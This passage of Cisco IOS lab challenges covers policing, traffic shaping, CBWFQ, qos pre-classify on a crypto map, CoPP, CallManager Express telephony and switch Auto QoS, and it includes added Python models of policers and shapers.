(config-pmap)# class VOIP
(config-pmap-c)# police ?
<8000-2000000000> Bits per second
cir
Committed information rate
(config-pmap-c)# police 1000 ?
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
action when rate is less than conform burst
pir
Peak Information Rate
<cr>
(config-pmap-c)# police 1000 5000 ?
<1000-512000000> Maximum burst bytes
conform-action
action when rate is less than normal burst
<cr>
(config-pmap-c)# police 1000 5000 9000
(config-pmap-c-police)# ?
QoS Class Police configuration commands:
conform-action action when rate is less than conform burst
exceed-action
action when rate is within conform and conform + exceed burst
exit
Exit from Police configuration mode
no
Negate or set default values of a command
violate-action action when rate is greater than conform + exceed burst
(config-pmap-c-police)# exit
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0

(config-if)# service-policy output NEW

In this example the traffic flow is policed for an average rate of 1000 bits per second, a
normal (conform) burst size of 5000 bytes, and an excess burst size of 9000 bytes.
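As an added example, not taken from the challenge, this Python models the two-bucket policer that `police 1000 5000 9000` configures (CIR in bits per second, Bc and Be in bytes) and runs a constructed packet sequence through it, so the conform, exceed and violate bands can be seen filling and refilling. The packet times and sizes and the action table (conform transmit, exceed drop, as Challenge 173 configures, with violate also dropping) are constructed here; nothing in it is IOS code.

```python
# Added model of the IOS "police <cir> <bc> <be>" two-bucket policer
# (a single-rate three-colour marker); illustration only, not IOS code.
from dataclasses import dataclass, field


@dataclass
class Policer:
    cir_bps: int            # committed information rate, bits per second
    bc_bytes: int           # conform burst: size of the committed bucket
    be_bytes: int = 0       # excess burst: size of the second bucket (0 = no excess bucket)
    tc: float = field(init=False)   # tokens in the committed bucket
    te: float = field(init=False)   # tokens in the excess bucket
    last: float = field(init=False, default=0.0)

    def __post_init__(self):
        self.tc = float(self.bc_bytes)
        self.te = float(self.be_bytes)

    def _refill(self, now):
        """Credit CIR/8 bytes per second; what overflows Bc spills into Be."""
        elapsed = max(0.0, now - self.last)
        self.last = max(self.last, now)
        earned = self.cir_bps / 8.0 * elapsed
        spill = max(0.0, self.tc + earned - self.bc_bytes)
        self.tc = min(float(self.bc_bytes), self.tc + earned)
        self.te = min(float(self.be_bytes), self.te + spill)

    def colour(self, now, size):
        """Return 'conform', 'exceed' or 'violate' for a packet of size bytes at time now."""
        self._refill(now)
        if size <= self.tc:
            self.tc -= size
            return "conform"
        if self.be_bytes == 0:
            return "exceed"             # single bucket: only conform/exceed exist
        if size <= self.te:
            self.te -= size
            return "exceed"
        return "violate"                # takes no tokens from either bucket


def police(policer, packets, actions):
    """Run (time_s, bytes) packets through the policer and return
    [(colour, action), ...]; actions maps a colour to 'transmit' or 'drop'."""
    out = []
    for t, size in packets:
        colour = policer.colour(t, size)
        out.append((colour, actions[colour]))
    return out


# Constructed sample: a burst of four 4000-byte packets at t=0, then three more
# 48 s later, by which time 1000 bps has earned 6000 bytes of credit.
SAMPLE_PACKETS = [(0.0, 4000), (0.0, 4000), (0.0, 4000), (0.0, 4000),
                  (48.0, 4000), (48.0, 2000), (48.0, 1000)]
# Actions as in Challenge 173 (conform transmit, exceed drop); violate drops too.
SAMPLE_ACTIONS = {"conform": "transmit", "exceed": "drop", "violate": "drop"}


def run_challenge_166():
    """police 1000 5000 9000 from the challenge above applied to SAMPLE_PACKETS."""
    return police(Policer(cir_bps=1000, bc_bytes=5000, be_bytes=9000),
                  SAMPLE_PACKETS, SAMPLE_ACTIONS)


def run_single_bucket():
    """A policer with no Be, like Challenge 173's 'police 9000': anything that does
    not conform is 'exceed'; 'violate' never appears. Bc=5000 is a constructed value."""
    return police(Policer(cir_bps=9000, bc_bytes=5000), SAMPLE_PACKETS, SAMPLE_ACTIONS)


if __name__ == "__main__":
    for (t, size), (colour, action) in zip(SAMPLE_PACKETS, run_challenge_166()):
        print(f"t={t:5.1f}s {size:5d} B -> {colour:8s} {action}")
```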

Cisco Router Challenge 167


Outline
This challenge involves traffic shaping.
Objectives
The objectives of this challenge are to:

Define traffic-shaping on an interface.

Example
> en
# config t
(config)# int s0
(config-if)# traffic-shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
fecn-adapt Enable Traffic Shaping reflection of FECN as BECN
group
configure token bucket: group <access-list> CIR (bps) [Bc (bits)
[Be (bits)]]
rate
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]]
(config-if)# traffic-shape rate ?
<8000-100000000> Target Bit Rate (bits per second)
(config-if)# traffic-shape rate 100 ?
<0-100000000> bits per interval, sustained
<cr>
(config-if)# traffic-shape rate 100 200 ?
<0-100000000> bits per interval, excess in first interval
<cr>
(config-if)# traffic-shape rate 100 200 300 ?
<0-4096> Set buffer limit
<cr>
(config-if)# traffic-shape rate 100 200 300
(config-if)# exit
(config)# int s1
(config-if)# traffic-shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
fecn-adapt Enable Traffic Shaping reflection of FECN as BECN
group
configure token bucket: group <access-list> CIR (bps) [Bc (bits)
[Be (bits)]]
rate
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]]
(config-if)# traffic-shape rate ?
<8000-100000000> Target Bit Rate (bits per second)

(config-if)# traffic-shape rate 100 ?
<0-100000000> bits per interval, sustained
<cr>
(config-if)# traffic-shape rate 100 200 ?
<0-100000000> bits per interval, excess in first interval
<cr>
(config-if)# traffic-shape rate 100 200 300 ?
<0-4096> Set buffer limit
<cr>
(config-if)# traffic-shape rate 100 200 300

Cisco Router Challenge 168


Outline
This challenge involves traffic shaping, with the streams identified by access-lists.
Objectives
The objectives of this challenge are to:

Define traffic-shaping on an interface from different flows.

Example
> en
# config t
(config)# access-list 101 permit ip host 1.2.3.4 any
(config)# access-list 102 permit ip host 1.2.3.5 any
(config)# int s0
(config-if)# traffic-shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
fecn-adapt Enable Traffic Shaping reflection of FECN as BECN
group
configure token bucket: group <access-list> CIR (bps) [Bc (bits)
[Be (bits)]]
rate
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]]
(config-if)# traffic-shape group ?
<1-2699> selecting Access list
(config-if)# traffic-shape group 101 ?
<8000-100000000> Target Bit Rate (bits per second)
(config-if)# traffic-shape group 101 1000 ?
<0-100000000> bits per interval, sustained
<cr>
(config-if)# traffic-shape group 101 1000
(config-if)# traffic-shape group 102 6000

This defines that the average rate for traffic from 1.2.3.4 will be 1000 bps, while it will be
6000 bps from 1.2.3.5. No other shaping will occur.

Cisco Router Challenge 169


Outline
This challenge involves using traffic shaping with frame relay. The shaper reacts to received
BECN bits by throttling back the flow.
Objectives
The objectives of this challenge are to:

Define traffic-shaping for congestion on a frame-relay interface.

Example
> en
# config t
(config)# int s0
(config-if)# encapsulation frame-relay
(config-if)# traffic-shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
fecn-adapt Enable Traffic Shaping reflection of FECN as BECN
group
configure token bucket: group <access-list> CIR (bps) [Bc (bits)
[Be (bits)]]
rate
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]]
(config-if)# traffic-shape rate 1000000
(config-if)# traffic-shape adaptive ?
<1-100000000> Lower Bound Target Bit Rate (bits per second)
(config-if)# traffic-shape adaptive 60000
(config-if)# traffic-shape fecn-adapt

This defines a committed information rate (CIR) of 60,000 bps, and an access rate of
1,000,000 bps.
FECN (Forward Explicit Congestion Notification)
BECN (Backward Explicit Congestion Notification)

Definitions:
http://searchnetworking.techtarget.com/sDefinition/0,,sid7_gci787381,00.html

Cisco Router Challenge 170


Outline
This challenge involves class-based shaping, where the shaping profile can be defined in a
policy-map.
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define class-based shaping.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
average
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]],
send out Bc only per interval
fecn-adapt
Enable Traffic Shaping reflection of FECN as BECN
fr-voice-adapt Enable rate adjustment depending on voice presence
max-buffers
Set Maximum Buffer Limit
peak
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]],
send out Bc+Be per interval
(config-pmap-c)# shape average ?
<8000-154400000> Target Bit Rate (bits per second), the value needs to be
multiple of 8000
(config-pmap-c)# shape average 8000 ?
<256-154400000> bits per interval, sustained. Needs to be multiple of 128.
Recommend not to configure it, the algorithm will find out
the best value
<cr>
(config-pmap-c)# exit

(config-pmap)# class DATA
(config-pmap-c)# shape average 80000 ?
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

Cisco Router Challenge 171


Outline
This challenge involves CBWFQ with generic traffic shaping (GTS).
> CCNP ONT Area: Unit 5: Congestion Avoidance, Policing, Shaping and Link Efficiency Mechanisms
Objectives
The objectives of this challenge are to:

Define class-based shaping.


Define bandwidth requirements.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 1720
(config)# access-list 101 permit tcp any any eq 80
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit
(config)# class-map DATA
(config-cmap)# match access-group 101
(config-cmap)# exit
(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# shape ?
adaptive
Enable Traffic Shaping adaptation to BECN
average
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]],
send out Bc only per interval
fecn-adapt
Enable Traffic Shaping reflection of FECN as BECN
fr-voice-adapt Enable rate adjustment depending on voice presence
max-buffers
Set Maximum Buffer Limit
peak
configure token bucket: CIR (bps) [Bc (bits) [Be (bits)]],
send out Bc+Be per interval

(config-pmap-c)# shape average ?
<8000-154400000> Target Bit Rate (bits per second), the value needs to be
multiple of 8000
(config-pmap-c)# shape average 800000 ?
<256-154400000> bits per interval, sustained. Needs to be multiple of 128.
Recommend not to configure it, the algorithm will find out
the best value
<cr>
(config-pmap-c)# bandwidth 512
(config-pmap-c)# exit
(config-pmap)# class DATA
(config-pmap-c)# shape peak ?
<8000-154400000> Target Bit Rate (bits per second), the value needs to be
multiple of 8000
(config-pmap-c)# shape peak 300000 ?
(config-pmap-c)# bandwidth 256
(config-pmap-c)# exit
(config-pmap)# exit
(config)# int e0
(config-if)# service-policy output NEW

In this case the VOIP class is given a bandwidth of 512 kbps and an output shaped to an
average of 800,000 bps, whereas DATA is given a bandwidth of 256 kbps and a peak
throughput of 300,000 bps.
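As an added example (not part of the challenge text), the following Python models what `shape average` and `shape peak` do with the CIR, Bc and Be named in the help text above: a token bucket that delays rather than drops, worth Bc bits per interval in average mode and Bc+Be in peak mode. The Bc and Be values and the packet burst are constructed; it models a continuously refilled bucket rather than the exact IOS interval scheduler, and it is not IOS code.

```python
# Added model of class-based shaping (shape average / shape peak); illustration
# only, not IOS code. Rates in bits per second, bursts in bits, times in seconds.


def shaping_interval(cir_bps, bc_bits):
    """Tc, the interval at which the shaper releases one Bc worth of credit."""
    return bc_bits / cir_bps


def peak_rate(cir_bps, bc_bits, be_bits):
    """Rate a 'shape peak' class sends at: Bc+Be bits every Tc."""
    return cir_bps * (1 + be_bits / bc_bits)


def shape(packets, cir_bps, bc_bits, be_bits=0, peak=False):
    """Return the departure time of each (arrival_s, size_bits) packet from a
    single FIFO fed through the shaper. A packet waits until the bucket holds
    enough credit; unlike a policer, nothing is dropped."""
    rate = peak_rate(cir_bps, bc_bits, be_bits) if peak else cir_bps
    capacity = bc_bits + be_bits if peak else bc_bits
    tokens = float(capacity)      # bucket starts full after an idle period
    now = 0.0
    departures = []
    for arrival, size in packets:
        if size > capacity:
            raise ValueError(f"{size}-bit packet can never fit in a {capacity}-bit bucket")
        if arrival > now:         # idle time earns credit, up to the bucket size
            tokens = min(capacity, tokens + rate * (arrival - now))
            now = arrival
        if size > tokens:         # not enough credit: hold the packet while credit accrues
            now += (size - tokens) / rate
            tokens = float(size)
        tokens -= size
        departures.append(now)
    return departures


def steady_rate(departures, size_bits, start_index):
    """Rate observed once the initial bucket credit is spent: bits sent from
    packet start_index onward divided by the time they took."""
    n = len(departures) - start_index - 1
    return n * size_bits / (departures[-1] - departures[start_index])


# Constructed burst: ten 1000-byte (8000-bit) packets arriving together at t=0.
BURST = [(0.0, 8000)] * 10
CIR, BC, BE = 800_000, 20_000, 20_000     # CIR from the VOIP class above; Bc/Be chosen here


def challenge_171_average():
    """shape average 800000 on the VOIP class: Bc per Tc, long-run rate = CIR."""
    return shape(BURST, CIR, BC)


def challenge_171_peak():
    """The same CIR with 'shape peak': Bc+Be per Tc, so the burst drains at CIR*(1+Be/Bc)."""
    return shape(BURST, CIR, BC, BE, peak=True)


if __name__ == "__main__":
    print(f"Tc = {shaping_interval(CIR, BC):.3f} s, peak rate = {peak_rate(CIR, BC, BE):.0f} bps")
    for name, fn, first in (("average", challenge_171_average, 2), ("peak", challenge_171_peak, 5)):
        dep = fn()
        print(f"{name:8s} departures {[round(t, 3) for t in dep]} "
              f"-> {steady_rate(dep, 8000, first):.0f} bps after the initial credit")
```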

Cisco ONT Test Unit 5


Key facts
Unit 5: Congestion Avoidance, Policing, Shaping, and Link Efficiency
Not available on this version.

Cisco Router Challenge 172


Outline

This challenge involves setting up a crypto map and applying it to an interface, with QoS
for a tunnel. It uses the qos pre-classify command, which is available only on tunnel
interfaces and crypto maps, not on normal interfaces.
Objectives
The objectives of this challenge are to:

Define a tunnel with a QoS service policy.


Define a crypto access-list to identify the traffic to encrypt.
Define IKE.
Define a crypto map.
Bind the ACL with the crypto map.
Apply crypto map to E0.

Example
> en
# config t
(config)# int tunnel1
(config-if)# ip address 1.2.3.4 255.255.255.0
(config-if)# int tunnel1
(config-if)# crypto ?
ipsec Set IPSec parameters
map
Assign a Crypto Map
(config-if)# crypto m ?
WORD Crypto Map tag
<cr>
(config-if)# crypto m manchester
(config-if)# tunnel ?
checksum enable end to end checksumming of packets
destination destination of tunnel
flow flow options
key security or selector key
mode tunnel encapsulation method
path-mtu-discovery Enable Path MTU Discovery on tunnel
protection Enable tunnel protection
sequence-datagrams drop datagrams arriving out of order
source source of tunnel packets
tos set type of service byte
ttl set time to live
udlr associate tunnel with unidirectional interface
(config-if)# tunnel source e0
(config-if)# tunnel destination 1.2.3.4
(config-if)# qos ?

pre-classify Enable QOS classification before packets are tunnel encapsulated
(config-if)# qos pre-classify
(config-if)# exit
(config)# hostname newhampshire
(config)# access-list 109 permit ip 50.93.142.0 0.0.255.255 136.163.130.0 0.0.255.255
(config)# crypto isakmp enable
(config)# crypto isakmp policy 111
(config-isakmp)# ?
ISAKMP commands:
authentication Set authentication method for protection suite
default
Set a command to its defaults
encryption
Set encryption algorithm for protection suite
exit
Exit from ISAKMP protection suite configuration mode
group
Set the Diffie-Hellman group
hash
Set hash algorithm for protection suite
lifetime
Set lifetime for ISAKMP security association
no
Negate a command or set its defaults
(config-isakmp)# encryption ?
3des Three key triple DES
aes
AES - Advanced Encryption Standard.
des
DES - Data Encryption Standard (56 bit keys).
(config-isakmp)# encryption des
(config-isakmp)# hash ?
md5 Message Digest 5
sha Secure Hash Standard
(config-isakmp)# hash sha
(config-isakmp)# authentication ?
pre-share Pre-Shared Key
rsa-encr
Rivest-Shamir-Adleman Encryption
rsa-sig
Rivest-Shamir-Adleman Signature
(config-isakmp)# authentication pre-share
(config-isakmp)# group ?
1 Diffie-Hellman group 1
2 Diffie-Hellman group 2
5 Diffie-Hellman group 5
(config-isakmp)# group 1
(config-isakmp)# exit
(config)# crypto isakmp identity hostname
(config)# crypto isakmp key test address 192.168.1.1
(config)# crypto ipsec transform-set finland esp-des
(config)# crypto map manchester 10 ipsec-isakmp
(config-crypto-map)# ?
Crypto Map configuration commands:
default
Set a command to its defaults
description
Description of the crypto map statement policy
dialer
Dialer related commands
exit
Exit from crypto map configuration mode
match
Match values.
no
Negate a command or set its defaults
qos
Quality of Service related commands
reverse-route Reverse Route Injection.
set
Set values for encryption/decryption
Router(config-crypto-map)# match ?

address Match address of packets to encrypt.
Router(config-crypto-map)# match address ?
<100-199>
IP access-list number
<2000-2699> IP access-list number (expanded range)
WORD
Access-list name
(config-crypto-map)# match address 109
(config-crypto-map)# set ?
identity
Identity restriction.
isakmp-profile
Specify isakmp Profile
peer
Allowed Encryption/Decryption peer.
pfs
Specify pfs settings
security-association Security association parameters
transform-set
Specify list of transform sets in priority order
(config-crypto-map)# set peer 144.55.62.1
(config-crypto-map)# set transform-set ?
WORD Proposal tag
(config-crypto-map)# set transform-set finland
(config-crypto-map)# qos pre-classify
(config-crypto-map)# exit
(config)# int e0
(config-if)# ip address 192.168.1.1 255.255.255.0
(config-if)# no shut
(config-if)# crypto map manchester
(config-if)# service-policy out ptest
(config-if)# exit
(config)# exit
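As an added example (not from the challenge or from Cisco), this Python models the classification problem that qos pre-classify solves: once the crypto map has ESP-encapsulated a packet, the ports that the VOIP and DATA class-maps match on are inside the ciphertext, so a port-based service-policy on E0 can only classify correctly if the decision was taken before encryption. The ACLs are the ones the earlier challenges use; the packet model, the class-map on DSCP and all function names are constructed here.

```python
# Added illustration of why a tunnel or crypto map needs "qos pre-classify" when
# the service-policy matches on ports; a simplified packet model, not IOS code.

# ACLs and class-maps as used by policy-map NEW in the earlier challenges:
# 100 = udp any any range 16384 32767 + tcp any any eq 1720, 101 = tcp any any eq 80.
ACLS = {
    100: [("udp", 16384, 32767), ("tcp", 1720, 1720)],
    101: [("tcp", 80, 80)],
}
CLASS_MAPS = [("VOIP", 100), ("DATA", 101)]     # evaluated in policy-map order
EF = 46                                         # DSCP the VOIP class is marked with


def match_acl(acl, pkt):
    """Extended ACL match on protocol and destination port (source is 'any')."""
    return any(pkt["proto"] == proto and lo <= pkt["dport"] <= hi
               for proto, lo, hi in ACLS[acl])


def classify_by_ports(pkt):
    """class-map VOIP / DATA via 'match access-group'; first match wins."""
    for name, acl in CLASS_MAPS:
        if match_acl(acl, pkt):
            return name
    return "class-default"


def classify_by_dscp(pkt):
    """Alternative class-map 'match ip dscp ef': needs only the outer header."""
    return "VOIP" if pkt["dscp"] == EF else "class-default"


def esp_tunnel_encapsulate(pkt):
    """Tunnel-mode ESP as applied by the crypto map: the original packet becomes
    ciphertext behind a new outer IP header that carries protocol 50 (ESP), no
    transport ports, and (by default) a copy of the inner DSCP."""
    return {"proto": "esp", "dport": None, "dscp": pkt["dscp"], "payload": "<encrypted>"}


def egress_class(pkt, classifier, pre_classify):
    """Class seen by the service-policy on the physical interface. With qos
    pre-classify the decision is made on the clear-text packet and carried
    through encapsulation; without it the encrypted packet is classified."""
    if pre_classify:
        return classifier(pkt)
    return classifier(esp_tunnel_encapsulate(pkt))


# Constructed packets: one RTP voice packet and one web packet.
VOICE = {"proto": "udp", "dport": 20000, "dscp": EF}
WEB = {"proto": "tcp", "dport": 80, "dscp": 0}


def summary():
    """Classification of the constructed packets under each setup."""
    return {
        "ports, no pre-classify": [egress_class(p, classify_by_ports, False) for p in (VOICE, WEB)],
        "ports, qos pre-classify": [egress_class(p, classify_by_ports, True) for p in (VOICE, WEB)],
        "dscp, no pre-classify": [egress_class(p, classify_by_dscp, False) for p in (VOICE, WEB)],
    }


if __name__ == "__main__":
    for setup, classes in summary().items():
        print(f"{setup:25s} voice -> {classes[0]:13s} web -> {classes[1]}")
```

The third row shows the alternative the page's marking challenges make possible: a class-map on DSCP still works after encryption because the outer header copies the inner DSCP, whereas the port-based one needs qos pre-classify.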

Cisco Router Challenge 173


Outline
This challenge involves defining CoPP (Control Plane Policing).
Objectives
The objectives of this challenge are to:

Define CoPP.
Apply the CoPP.

Example
> en
# config t
(config)# access-list 100 permit udp any any range 16384 32767
(config)# access-list 100 permit tcp any any eq 560
(config)# access-list 100 permit udp any any eq 560
(config)# class-map VOIP
(config-cmap)# match access-group 100
(config-cmap)# exit

(config)# policy-map NEW
(config-pmap)# class VOIP
(config-pmap-c)# police ?
<8000-2000000000> Bits per second
cir
Committed information rate
(config-pmap-c)# police 1000 ?
<1000-512000000> Burst bytes
bc
Conform burst
conform-action
action when rate is less than conform burst
pir
Peak Information Rate
<cr>
(config-pmap-c)# police 9000 conform ?
drop
drop packet
set-clp-transmit
set atm clp and send it
set-dscp-transmit
set dscp and send it
set-mpls-exp-transmit set exp and send it
set-prec-transmit
rewrite packet precedence and send it
set-qos-transmit
set qos-group and send it
transmit
transmit packet
(config-pmap-c)# police 9000 conform transmit ?
exceed-action action when rate is within normal and max burst
<cr>
(config-pmap-c)# police 9000 conform transmit exceed-action ?
drop
drop packet
set-clp-transmit
set atm clp and send it
set-dscp-transmit
set dscp and send it
set-mpls-exp-transmit set exp and send it
set-prec-transmit
rewrite packet precedence and send it
set-qos-transmit
set qos-group and send it
transmit
transmit packet
(config-pmap-c)# police 9000 conform transmit exceed-action drop ?
violate-action action when rate is greater than max burst
<cr>
(config-pmap-c)# police 9000 conform transmit exceed drop
(config-pmap-c)# exit
(config-pmap)# exit
(config)# control-plane
(config-cp)# service-policy output NEW

Cisco Router Challenge 174


Outline
This challenge involves configuring telephony.
Objectives
The objectives of this challenge are to:

Define telephony settings.

Example
> en
# config t
(config)# telephony-service
(config-telephony)# ?
Cisco IOS Telephony Service configuration commands:
application
The selected application
call-forward
Define E.164 telephone number for call forwarding
create
create cnf for ethernet phone
date-format
Set date format for IP Phone display
default
Set a command to its defaults
dialplan-pattern Define E.164 telephone number prefix
directory
Define directory naming order
dn-webedit
enable Edit DN through Web
exit
Exit from telephony-service configuration mode
ip
Define IP address and port for Telephony-Service/Fallback
keepalive
Define keepalive timeout period to unregister IP phones
load
Select the IP phone firmware load file
max-conferences
Define max number of 3 party G.711 conferences
max-dn
Maximum directory numbers supported
max-ephones
Define max number of IP phones
moh
Define music-on-hold filename
mwi
Define IP address and port for MWI Server
network-locale
Define ephone network locale
no
Negate a command or set its defaults
reset
reset ethernet phone
restart
restart ethernet phone
service
Service configuration in ITS
time-format
Set time format for IP Phone display
time-webedit
enable Edit Time through Web
timeouts
Define timeout value for IP phone
transfer-pattern Define valid call transfer destinations
transfer-system
Define call transfer system: blind/consult and
local/end-to-end
url
Define Ephone URL's
user-locale
Define ephone user locale
voicemail
Set the voicemail access number called when the MESSAGES IP
phone button is pressed
web
define username for admin user

(config-telephony)# max-ep ?
<1-48> Maximum phones to support
(config-telephony)# max-ep 10 ?
<cr>
(config-telephony)# max-ephones 10

(config-telephony)# max-dn ?
<1-192> Maximum directory numbers supported
(config-telephony)# max-dn 10 ?
<cr>
(config-telephony)# max-dn 10

(config-telephony)# keepalive ?
<10-65535> Time in seconds
(config-telephony)# keepalive 10
(config-telephony)# system message this is a Cisco IP phone

(config-telephony)# create ?
cnf-files create XML cnf for ethernet phone
(config-telephony)# create cnf-files
(config-telephony)# ip ?
source-address Define IP address and port for Telephony-Service/Fallback
(config-telephony)# ip source-address ?
A.B.C.D Define IP source address
(config-telephony)# ip source-address 1.2.3.4 ?
port Define tcp port for Telephony Service/CM FALLBACK
<cr>
(config-telephony)# ip source-address 1.2.3.4 p ?
<2000-9999> Specify the port: 2000 - 9999
<cr>
(config-telephony)# ip source-address 192.168.0.1 port 2000
(config-telephony)# voicemail ?
WORD voicemail access number
(config-telephony)# voicemail 5555
(config-telephony)# web ?
admin
define username for admin user
customize define customization file name
(config-telephony)# web admin ?
customer customer admin
system
system admin
(config-telephony)# web admin system ?
name
admin username
password admin password
(config-telephony)# web admin system name ?
WORD username for admin
(config-telephony)# web admin system name test password pass
(config-telephony)# dn-webedit
(config-telephony)# time-webedit

Cisco Router Challenge 175


Outline
This challenge involves configuring telephony by creating directory numbers.
Objectives
The objectives of this challenge are to:

Define telephony settings.


Define directory numbers.
Define a call forwarding number on a non-answer.

Example
> en
# config t
(config)# telephony-service
(config-telephony)# max-ephones 10
(config-telephony)# max-dn 10
(config-telephony)# keepalive 10
(config-telephony)# system message this is a Cisco IP phone
(config-telephony)# create cnf
(config-telephony)# ip source-address 192.168.0.1 port 2000
(config-telephony)# voicemail 5555
(config-telephony)# web admin system name test password pass
(config-telephony)# exit
(config)# ephone-dn 1
(config-ephone-dn)# ?
Ephone DN configuration commands:
application    The selected application
call-forward   Define E.164 telephone number for call forwarding
caller-id      Configure port caller id parameters
cor            Class of Restriction on dial-peer for this dn
default        Set a command to its defaults
description    dn desc, for DN Qualified Display Name
exit           Exit from ephone-dn configuration mode
feed           set live feed multicast stream mode
hold-alert     Set Call On-Hold timeout alert parameters
huntstop       Stop hunting on Dial-Peers
intercom       Define intercom/auto-call extension number
loopback-dn    Define dn-tag to create loopback dn pair with this ephone-dn
moh            set live-feed music-on-hold mode (with optional multicast)
mwi            set message waiting indicator options (mwi)
name           Define dn user name
no             Negate a command or set its defaults
number         Define E.164 telephone number
paging         set audio paging mode
preference     Preference for the attached dial-peer for the primary dn number
transfer-mode  Define call transfer mode: blind vs. consult
translate      Translation rule
(config-ephone-dn)# number 5501
(config-ephone-dn)# name fred
(config-ephone-dn)# call-forward noan 5503 timeout 10
(config-ephone-dn)# exit
(config)# ephone-dn 2
(config-ephone-dn)# number ?
WORD  A sequence of digits - representing telephone number
(config-ephone-dn)# number 5502 ?
no-reg     Set E164 not register
secondary  secondary dn number
<cr>
(config-ephone-dn)# number 5502
(config-ephone-dn)# name ?
LINE  user name, use quoted string if including spaces
(config-ephone-dn)# name bert
(config-ephone-dn)# call-forward ?
all   forward all calls
busy  forward call on busy
noan  forward call on no-answer
(config-ephone-dn)# call-forward all ?
WORD  A sequence of digits - representing E.164 number
(config-ephone-dn)# call-forward all 5504

Cisco Router Challenge 176


Outline
This challenge involves configuring telephony by creating an e-phone.
Objectives
The objectives of this challenge are to:

Define an e-Phone.
Define telephony settings.
Define directory numbers.
Define a call forwarding number on no-answer.

Example
> en
# config t
(config)# ephone 1
(config-ephone)# ?
Ethernet phone configuration commands:
button        define button to dn map
default       Set a command to its defaults
exit          Exit from ephone configuration mode
keepalive     Define keepalive timeout period to unregister IP phone
mac-address   define ethernet phone MAC address
no            Negate a command or set its defaults
paging-dn     set audio paging dn group for phone
reset         reset ethernet phone
restart       restart ethernet phone
speed-dial    Define ip-phone speed-dial number
type          Define ip-phone type
username      define username to access ethernet phone from Web
vm-device-id  define voice-mail id string
(config-ephone)# mac-address ?
H.H.H  Mac address
<cr>
(config-ephone)# mac-address 0001.0002.0003
(config-ephone)# type ?
7910       Cisco IP Phone 7910
7935       Polycom 7935
7940       Cisco IP Phone 7940
7960       Cisco IP Phone 7960
ata        ATA phone emulation for analog phone
cipc       Cisco IP Communicator
vgc-phone  vg248 phone emulation for analog phone
(config-ephone)# type cipc
(config-ephone)# button ?
LINE  button-index:dn-index pairs example 1:2 2:5
(config-ephone)# button 1:1
(config-ephone)# exit
(config)# telephony-service
(config-telephony)# max-ephones 10
(config-telephony)# max-dn 10
(config-telephony)# keepalive 10
(config-telephony)# system message this is a Cisco IP phone
(config-telephony)# create cnf-files
(config-telephony)# ip source-address 192.168.0.1 port 2000
(config-telephony)# voicemail 5555
(config-telephony)# exit
(config)# ephone-dn 1
(config-ephone-dn)# number 5501
(config-ephone-dn)# name fred
(config-ephone-dn)# call-forward noan 5503 timeout 10
(config-ephone-dn)# exit
(config)# ephone-dn 2
(config-ephone-dn)# number 5502
(config-ephone-dn)# name bert
(config-ephone-dn)# call-forward all 5504

Note:
If Cisco IP Communicator is used to simulate Ethernet phones, the type is cipc. The MAC address is entered in the H.H.H form (three groups of four hexadecimal digits, for example 0001.0002.0003) and must match the address of the phone that is to register, since the ephone is matched to the phone by it. The button command maps phone buttons to directory numbers: button 1:2 assigns the first button to the second directory number (ephone-dn 2).

Cisco Switch Challenge 70

Outline
This challenge involves configuring Auto QoS on a switch.
Objectives
The objectives of this challenge are to:

Define Auto QoS.

Example
> en
# config t
(config)# cdp run
(config)# vlan 10
(config-vlan)# exit
(config)# vlan 20
(config-vlan)# exit
(config)# int fa0/1
(config-if)# cdp enable
(config-if)# switchport ?
access         Set access mode characteristics of the interface
block          Disable forwarding of unknown uni/multi cast addresses
broadcast      Set broadcast suppression level on this interface
encapsulation  Set trunking encapsulation when interface is in trunking mode
host           Set port host
mode           Set trunking mode of the interface
multicast      Set multicast suppression level on this interface
native         Set trunking native characteristics when interface is in trunking mode
nonegotiate    Device will not engage in negotiation protocol on this interface
port-security  Security related command
priority       Set appliance 802.1p priority
protected      Configure an interface to be a protected port
pruning        Set pruning VLAN characteristics when interface is in trunking mode
trunk          Set trunking characteristics of the interface
unicast        Set unicast suppression level on this interface
voice          Voice appliance attributes
<cr>
(config-if)# switchport access vlan 10
(config-if)# switchport voice ?
vlan  Vlan for voice traffic
(config-if)# switchport voice vlan ?
<1-4094>  Vlan for voice traffic
dot1p     Priority tagged on PVID
none      Don't tell telephone about voice vlan
untagged  Untagged on PVID
(config-if)# switchport voice vlan 20
(config-if)# auto ?
qos  Configure AutoQoS
(config-if)# auto qos ?
voip  Configure AutoQoS for VoIP
(config-if)# auto qos voip ?
cisco-phone  Trust the QoS marking of Cisco IP Phone
trust        Trust the COS marking
(config-if)# auto qos voip cisco-phone
(config-if)# exit

Note:
For Auto QoS VoIP, CDP needs to be enabled, both globally (cdp run) and on the port (cdp enable): with the cisco-phone keyword the port only trusts the CoS/DSCP markings while CDP reports a Cisco IP phone attached, and drops back to untrusted when the phone is unplugged. The trust keyword trusts whatever marking the attached device sends, so a host on such a port can mark its own traffic into the voice queue; use it only on ports that face a device you control.

Cisco Router Challenge 177

Outline
This challenge involves configuring custom queueing.
Objectives
The objectives of this challenge are to:

Define custom queuing (CQ) for particular queues.
